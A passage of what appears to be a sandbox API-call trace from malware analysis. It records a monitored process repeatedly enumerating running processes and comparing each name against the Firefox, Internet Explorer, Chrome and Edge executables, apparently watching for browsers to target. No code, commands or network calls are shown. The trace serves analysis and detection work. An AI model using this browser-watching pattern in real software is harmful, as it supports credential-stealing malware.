lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.267] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.267] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.267] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.267] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.267] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.267] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0216.268] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0216.268] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0216.268] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0216.268] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0216.268] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0216.268] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0216.268] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0216.268] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0216.268] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.269] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.269] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.270] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.270] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.270] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.270] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.270] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0216.270] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0216.270] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0216.271] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0216.271] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0216.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0216.271] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0216.271] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0216.271] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0216.271] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0216.271] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 0 [0216.459] CloseHandle (hObject=0xd4) returned 1 [0216.459] Sleep (dwMilliseconds=0x3e8) [0217.488] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd4 [0217.491] Process32First (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.491] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0217.491] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0217.491] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0217.491] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0217.491] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.492] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0217.492] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0217.492] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0217.492] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0217.492] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.492] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0217.493] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0217.493] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0217.493] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.493] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.493] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0217.493] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0217.493] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0217.493] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.493] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.494] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0217.494] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0217.494] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0217.494] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.494] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.494] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0217.494] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0217.494] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0217.494] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.494] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.495] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0217.495] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0217.495] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0217.495] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.495] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.495] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0217.495] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0217.495] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0217.495] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.495] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.496] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0217.496] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0217.496] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0217.496] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.496] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.497] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0217.497] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0217.497] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0217.497] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.497] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.497] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.497] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.497] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.497] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.497] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.498] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.498] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.498] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.499] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.499] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.499] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.500] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0217.500] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0217.500] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0217.500] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.500] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.500] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.501] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.501] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.501] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.501] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.501] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.501] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.501] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.501] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.501] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.502] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0217.502] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0217.502] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0217.502] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.502] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.502] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0217.502] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0217.502] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0217.502] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.502] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.503] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0217.503] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0217.503] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0217.503] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.503] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.503] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0217.503] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0217.503] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0217.503] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.503] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0217.504] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0217.504] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0217.504] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0217.504] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.504] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0217.504] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0217.505] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0217.505] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0217.505] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0217.505] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0217.505] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0217.505] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0217.505] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.505] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0217.506] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0217.506] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0217.506] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0217.506] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0217.506] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0217.506] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0217.506] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0217.506] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.506] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0217.507] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0217.507] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0217.507] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0217.507] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0217.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0217.507] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0217.507] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0217.507] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0217.507] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.507] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0217.508] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0217.508] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0217.508] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0217.508] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.508] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0217.508] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0217.508] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0217.509] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0217.509] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.509] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0217.509] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0217.509] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0217.509] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0217.509] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0217.509] Process32Next (in: 